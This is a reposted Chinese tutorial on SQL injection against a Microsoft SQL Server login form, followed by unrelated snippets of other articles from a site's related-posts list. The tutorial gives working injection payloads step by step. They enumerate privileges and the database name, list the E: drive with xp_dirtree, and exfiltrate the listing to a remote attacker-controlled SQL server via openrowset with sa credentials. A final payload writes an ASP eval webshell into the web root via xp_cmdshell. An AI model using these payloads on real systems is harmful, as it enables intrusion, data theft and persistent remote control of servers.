高级SQL注入拿shell,一般黑客不知道。哈客

服务器只有一个站,又找不到注入点怎么办?
    你可以试试在搜索框,登陆,任何框框里放个单引号,看看是否报错       
       初级部分

              

加个单引号',后面随便,随便填个密码,点击登陆

              

典型的SQL注入
判断权限: ' and user>0--

                          

              

明显的sa权限

获取数据库名字: ' and db_name()>0--

                        

              

                   

很容易获取到,数据库名,如果不是sa权限 ,比如public权限,我们可以通过差异备份获取shell,但本教程不必了
下面开始高级部分:
就不截图了,就是把下面代码放入登录框执行
一:建表,3个字段
';create table nonamed([name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);--
二,把服务器e盘目录和文件名字全部加入到表中(为什么e盘,因为e盘放的是网站目录,我就不啰嗦了)
';insert nonamed execute master..xp_dirtree 'e:\',1,1--

三,把此表中内容插入到远程计算机的SQL数据库中,(自己的电脑)
   必须有外网,
本地的电脑必须有一张和服务器创建相同的表,表名无所谓,此例子为e表
';insert into openrowset('sqloledb', '222.222.222.222';'sa';'123456', 'select * from test.dbo.e') select * from nonamed--

回到本地查询表e

                   

              

上面的第3个XXX_Site 里面就是放的网站,如何看XXX_Site里的内容,继续循环执行前面二三步就可以了,
再次执行要情空表 delete from nonamed
然后执行
';insert nonamed execute master..xp_dirtree 'e:\XXX_Site\',1,1--
';insert into openrowset('sqloledb', '222.222.222.222';'sa';'123456', 'select * from test.dbo.e_site') select * from nonamed--
e_site表是本地的表
发现wwwroot 
好了,写一句话木马吧!
';exec master..xp_cmdshell 'Echo ^<%eval request("a")%>^ >e:\xxx_site\wwwroot\a.asp'
public权限可以通过差异备份写马,上面已经提到了
远程连接即可

转载于:https://www.cnblogs.com/amwld/archive/2011/08/11/2134975.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/298150.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

使用 SVG 动画实现弹性的页面元素效果

Codrops 分享了一些给SVG元素加上弹性动画的灵感。实现的思路是把一个SVG元素整合成一个组件&#xff0c;然后从一个路径弹性动画到另一个。这种效果可以应用到像菜单&#xff0c;按钮或其它元素&#xff0c;使得交互更有趣&#xff0c;看起更原生与自然的感觉。 在线演示 …

CCNA,CCNP资料

CCNA资料、、、、、、、、、、、、、、、、、、、、转载于:https://blog.51cto.com/youye/334779

虚拟ip工具_针对游戏防封换IP有用吗?

如今的网游有的有局限ip地址登录&#xff0c;就是说1个ip地址只可以登录1个或是两个客户端&#xff0c;可是也不是全部的游戏都局限&#xff0c;那麼针对ip限制怎样游戏多开呢&#xff1f;游戏局限针对许多用户而言是很不太好的&#xff0c;由于它们需用非常好号来挂&#xff0…

万万没想到,刷1000道题目,还不如搞懂这几个机械动图!

▲ 点击查看 著名教育家蒙台梭利曾说&#xff1a;“孩子成长中最重要、最基本的就是注意力集中”。而乔布斯也曾说&#xff1a;“专注和简单一直是我的秘诀之一。观察一下你家的孩子&#xff0c;会不会经常出现这种情况:孩子上课坐不住、总跑神&#xff0c;小动作不断&#xf…

Mysql日期

2019独角兽企业重金招聘Python工程师标准>>> create view fin1 as select o.code, s.organization_name,s.name,s.sex,s.identity_card_number,date_format(s.final_into_association_time,%Y-%m-%d),s.number_of_worked_in_association,(year(now())-year(s.begin_…

复制一个文件夹中的所有文件和文件夹的java程序实现

使用java程序实现了对文件夹的复制功能&#xff1a; package demo.io; import java.io.BufferedInputStream;import java.io.BufferedOutputStream;import java.io.BufferedReader;import java.io.BufferedWriter;import java.io.File;import java.io.FileInputStream;import j…

Silverlight 2.5D RPG游戏技巧与特效处理:(十六)动态资源

即开即玩是网页游戏相比传统客户端游戏的最大优势。如果说在每台电脑安装上G的客户端是一种资源浪费及时间污染&#xff1b;那么Silverlight作为RIA界的新宠儿&#xff0c;在继承祖辈优秀血统的前提下拥有更加卓越的性能及更为曼妙的动态表现&#xff0c;势将引领网络未来世界进…

python pp模块_Python模块--Pexpect

探索 Pexpect&#xff0c;第 1 部分&#xff1a;剖析 Pexpect概述Pexpect 是 Don Libes 的 Expect 语言的一个 Python 实现&#xff0c;是一个用来启动子程序&#xff0c;并使用正则表达式对程序输出做出特定响应&#xff0c;以此实现与其自动交互的 Python 模块。 Pexpect 的使…

mysql root密码忘记2018_2018-03-28设置及修改mysql用户密码学习笔记

退出mysql方法quit或者exit设置及修改mysqlroot用户密码安装mysql后&#xff0c;默认管理员root密码为空&#xff0c;这很不安全&#xff0c;需要设置一个密码&#xff0c;在安装mysql单实例后&#xff0c;有个初始优化的一些安全措施&#xff1a;为root设置了密码删除无用的my…

如何机智的弄坏一台电脑?

全世界只有3.14 % 的人关注了爆炸吧知识原文&#xff1a;http://litten.me/2015/07/06/hack-in-localstorage/作者&#xff1a;Litten很多人都在说&#xff1a;“技术领域当中&#xff0c;前端最没有技术含量&#xff0c;且容易被替代。”有人说&#xff0c;前端的能力界限顶多…

局域网屏幕监控软件

选择一款好的局域网屏幕监控软件要注意哪些问题&#xff1f;相信这是很多企业老板、网管都关心的问题之一。网上各种监控软件那么多&#xff0c;万一下载一个不好用的软件&#xff0c;不仅浪费的是时间&#xff0c;甚至因为软件稳定性不好&#xff0c;影响员工工作效率就不好了…

android 学习查阅笔记

给自己一个链接地址方便找http://www.cnblogs.com/TerryBlog/archive/2010/06/25/1764821.htmlAndroid与IIS身份验证——基本验证http://www.cnblogs.com/GoodHelper/archive/2011/08/17/android_iis_01.html转载于:https://www.cnblogs.com/yjrl/archive/2011/08/14/2137692.h…

pythonlive2d_Unity-Live2D资源载入

在Live2d上下载的资源模型是.cmox格式的&#xff0c;无法直接在unity内使用&#xff0c;需要在Cubism中导出成.moc文件。1.将下载的.cmox资源直接拖入Cubism2.导出的时候有2.0版本和3.0版本的&#xff0c;如图随便哪个版本都OK&#xff0c;这里2.0和3.0的区别是&#xff0c;3.0…

C#为什么会这么慢之命运之终章-真理篇for firelong

firelong我真得希望你来看一看&#xff0c;可惜上一篇你错过了。c#会这么慢的话题却是始终充满着火药味&#xff0c;也许说真话真的很不动听&#xff0c; 可能上次的帖子firelong没看到&#xff0c;讨论C#哪能错过微软&#xff0c;.NET战略是微软当年的号称终极兵器的究级必杀技…

mysql 备份 master_如何配置MYSQL的MASTER---SLAVE复制备份?

一、配置一个mysql服务器做master&#xff1a;在配置文件my.ini中添加如下内容&#xff1a;log-binmatster-binlog-bin-indexmatster-bin.indexserver-id1master必须有一个活动的二进制日志和唯一的server-id,然后重启mysql服务器。其次&#xff0c;以root登录&#xff0c;创建…

豆瓣评分9分+,这6部经典趣味数学纪录片堪称神作!

全世界只有3.14 % 的人关注了爆炸吧知识数学是研究数量、结构、变化以及空间模型等概念的一门学科。透过抽象化和逻辑推理的使用&#xff0c;由计数、计算、量度和对物体形状及运动的观察中产生。数学家们拓展这些概念&#xff0c;为了公式化新的猜想以及从合适选定的公理及定义…

C++游戏开发需要阅读的书籍

如果要自学游戏程序开发的话&#xff0c;可以看看下面的&#xff0c;呵呵。 游戏开发资料&#xff08;PDF书都是中文版的&#xff0c;非英文&#xff0c;很多是本人自己扫描制作&#xff0c;从未网上发布过&#xff0c;所以独家啦&#xff09;&#xff1a; 1、Gamebryo 2.2游…

32位hex转浮点 python_python——int()、hex()、oct()、bin()、float()数值类型转换函数

摘要&#xff1a;在python中&#xff0c;数值类型转换函数常用的有浮点型float()、取整int()、八进制oct()、二进制bin()、十六进制hex()这五个函数。单词float的意思就是浮动的意思&#xff1b;int是单词integer整数的前三个字母&#xff1b;oct是单词八进制octal的前三个字母…

C语言运算符优先级 详细列表

优先级 运算符 名称或含义 使用形式 结合方向 说明 1 [] 数组下标 数组名[常量表达式] 左到右 () 圆括号 &#xff08;表达式&#xff09;/函数名(形参表) . 成员选择&#xff08;对象&#xff09; 对象.成员名 -> 成员选择&#xff08;指针&#xff09; …

我的闪存

快速记录平时需要保存的知识点。博客园的闪存&#xff0c;能输入的内容不丰富&#xff0c;比如不能贴代码。